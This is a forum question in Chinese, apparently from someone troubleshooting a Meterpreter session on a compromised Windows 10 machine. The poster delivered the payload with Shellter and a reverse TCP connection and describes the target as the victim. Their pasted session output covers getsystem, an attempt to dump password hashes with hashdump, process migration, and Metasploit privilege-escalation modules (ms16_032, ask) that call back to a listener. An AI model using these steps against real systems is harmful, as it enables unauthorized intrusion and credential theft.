我面临一个非常奇怪的问题。我已经成功地使用 Shellter 和 Meterpreter_Reverse TCP 弹出了一个盒子。

这是系统信息：

meterpreter > sysinfo
Computer        : ********
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows

现在奇怪的是当我输入：

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

它说我已经获得了 NT 授权，但是当我输入：

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeAssignPrimaryTokenPrivilege
  SeChangeNotifyPrivilege
  SeCreateGlobalPrivilege
  SeDebugPrivilege
  SeImpersonatePrivilege
  SeSystemProfilePrivilege
  SeTcbPrivilege

这些只是我得到的特权。不是全部。如果我尝试使用 hashdump ：

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

另外，我已经迁移到另一个 NT 授权进程，在这种情况下（ svchost.exe ）

如果我尝试运行任何后台本地漏洞利用，则表明系统已经提升。

msf exploit(ms16_032_secondary_logon_handle_privesc) > run

[*] Started reverse TCP handler on 192.168.0.100:4444
[-] Exploit aborted due to failure: none: Session is already elevated

此外，如果我尝试使用“ASK”漏洞获取特权，会发生以下情况：

msf exploit(ask) > run

[*] Started reverse TCP handler on 192.168.0.100:4444
[+] UAC is not enabled, no prompt for the user
[*] Uploading eobKMikmOsnWp.exe - 73802 bytes to the filesystem...
[*] Executing Command!

它只是冻结，受害者计算机上没有任何提示。

还有我尝试运行的任何命令，它只会给我一个错误，指出我无权访问：

meterpreter > kill 7744
Killing: 7744
[-] stdapi_sys_process_kill: Operation failed: Access is denied.

我完全无法理解这里到底发生了什么？它说我已经获得了系统的访问权限，但我仍然无法做任何事情？

为什么？

任何帮助，将不胜感激。